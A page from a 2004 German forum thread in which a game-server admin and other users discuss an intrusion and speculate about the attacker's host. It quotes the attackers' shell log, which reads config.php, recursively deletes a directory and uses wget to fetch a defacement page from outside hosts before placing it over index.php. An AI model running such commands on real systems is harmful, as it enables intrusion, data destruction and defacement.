WCM Forum
Seite 3 von 5 < 12 3 45 >
40 Beiträge dieses Themas auf einer Seite anzeigen

WCM Forum (http://www.wcm.at/forum/index.php)
-   Linux, UNIX, Open Source (http://www.wcm.at/forum/forumdisplay.php?f=13)
-   -   Server gehacked (http://www.wcm.at/forum/showthread.php?t=151972)

Dumdideldum 03.12.2004 14:18
Zitat:
Original geschrieben von Sloter
Nö, Server wurde nicht vom Netz genommen.
Leider finde ich die Mails nicht mehr, Imho war es sogar die selbe Maschine.

Schau dich um auf der Maschine, man findet sehr leicht das Verzeichnis mit der Software.
Meinst du jetzt den Server vom Angreifer ?
Wenn ja, her mit den Verzeichnissen. Ein Ratespiel ist schon heftig.

Zitat:

@dumdideldum
Feigling, es genügen ein paar Wörter.
Ahmed dankt ServerPlanet für die Unterstützung im Kampf gegen den Imperialismus :D

Sloter
:D

frazzz 03.12.2004 14:25
endlich mal ein sehr interessanter thread :)


btw: wenn der angreifer schon seine tools anbietet, so nutze sie doch :hehe:

Sloter 03.12.2004 14:34
@frazzz
Die Tools und Scripten findest du leicht im Netz.

@dumdideldum
Ich kann dir keine Anleitung geben, das wäre nicht legal ;-)

Du hast doch einen wget in deinen Logs.
Laß das wget weg und gib das ganze in den Browser ein, ohne abschließenden Dateiangabe.
http://www.domain.com/verzeichnis/

Sloter

frazzz 03.12.2004 14:35
Zitat:
Original geschrieben von Sloter
@frazzz
Die Tools und Scripten findest du leicht im Netz.
Zitat:
Original geschrieben von Sloter
Schau dich um auf der Maschine, man findet sehr leicht das Verzeichnis mit der Software.
was jetzt? ;)

Dumdideldum 03.12.2004 14:49
@sloter:
Ich weiß noch immer nicht, welchen Server du genau meinst, pm ;)

Nach erneuter Dursicht der Logs bin ich mir nicht mehr so sicher, ob dies ernst zu nehmende Hacker waren.
Sieht viel mehr nach l33t h4xx0r aus :D

Zitat:
ls
cat config.php
ls
rm -R -f sigs
ls
wget www.ghosn.org/shk2.html
ls
pico shk2.html
cat shk2.html
wget http://willysbirthday.com/hacked.html
wget http://willysbirthday.com/images/boxoesx.gif
mv hacked.html index.php
mkdir images
mv boxoesx.gif /images
mv boxoesx.gif images/
wget www.ghosn.org/shk2.swf
ls
Das ein Auszug aus den Befehlen, die sie getätigt haben.
Eben zwei bringen mich zur Annahme, dass eher dodln am Werk waren:
1) pico shk2.html
Seit wann ist es möglich, pico über einen Browser zu bedienen ?
2) cp boxoesx.gif /images
Hamma vergessen dass man nicht im / ist?

frazzz 03.12.2004 14:57
Zitat:
Original geschrieben von Dumdideldum
@sloter:
Ich weiß noch immer nicht, welchen Server du genau meinst, pm ;)

Nach erneuter Dursicht der Logs bin ich mir nicht mehr so sicher, ob dies ernst zu nehmende Hacker waren.
Sieht viel mehr nach l33t h4xx0r aus :D



Das ein Auszug aus den Befehlen, die sie getätigt haben.
Eben zwei bringen mich zur Annahme, dass eher dodln am Werk waren:
1) pico shk2.html
Seit wann ist es möglich, pico über einen Browser zu bedienen ?
2) cp boxoesx.gif /images
Hamma vergessen dass man nicht im / ist?

der srv, dessen ip du in deinen logs findest :rolleyes:

denk ich auch, das es kiddies waren.
ernstzunehmen, ja. immerhin konnten sie eindringen, also passt was nicht.

Dumdideldum 03.12.2004 15:07
Zitat:
Original geschrieben von frazzz
der srv, dessen ip du in deinen logs findest :rolleyes:
huh ?
Das ist kein WWW server, sondern, wie bereits geschrieben, ein gameserver.

Insofern bringt mir http Nüsse.

frazzz 03.12.2004 15:10
Zitat:
Original geschrieben von Dumdideldum
Das ist kein WWW server, sondern, wie bereits geschrieben, ein gameserver.

ist doch egal, wozu der server dient(e)
du findest ein verzeichnis mit der hackersoftware ;)


Zitat:
Original geschrieben von Sloter

Wenn du dich auf der Maschine vom Angreifer umsiehst, findest du ein verzeichnis mit allmöglichen Hackertools und Scripten die Exploits ausnützen.

Philipp 03.12.2004 16:15
Zitat:
Original geschrieben von Sloter
Nö, Server wurde nicht vom Netz genommen.
Leider finde ich die Mails nicht mehr, Imho war es sogar die selbe Maschine.
Es ist sehr unwahrscheinlich das es die gleiche Machine ist. The Planet ist ein relativ grosser Provider mit mehreren Rechenzentren und tausenden von Servern.

Das dort monatelang der gleiche Server als Hackmachine verwendet wird, kann ich mir irgendwie nicht vorstellen. Ich kenne The Planet wirklich sehr sehr gut... ;)

http://uptime.netcraft.com/up/graph?...majorgeeks.com
http://uptime.netcraft.com/up/graph?...majorgeeks.com
http://uptime.netcraft.com/up/graph?...majorgeeks.com

Der zweite Total Control Server wird in Kürze bestellt und ersetzt meine derzeitige Dual Xeon Machine bei EV1/Rackshack :)

Sloter 03.12.2004 18:48
Ich guck Morgen nocheinmal nach in meinem Mailarchiv.
Ich kann mich nur auf die Domain erinnern willysbirthday.com.

Ich kann mir aber schon vorstellen das es die Burschen von ThePlanet nicht sonderlich interressiert.
Das anbieten von Tools und Scripten ist nichts verwerfliches und wo bitte soll Österreich sein?

Wir werden ja sehen, wie lange die Maschine von der Dumdideldum angegriffen wurde, online ist.
Bis jetzt schaut es nicht danach aus, als würde sie offline gehen.

Sloter


Alle Zeitangaben in WEZ +2. Es ist jetzt 01:52 Uhr.
Seite 3 von 5 < 12 3 45 >
40 Beiträge dieses Themas auf einer Seite anzeigen

Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
© 2009 FSL Verlag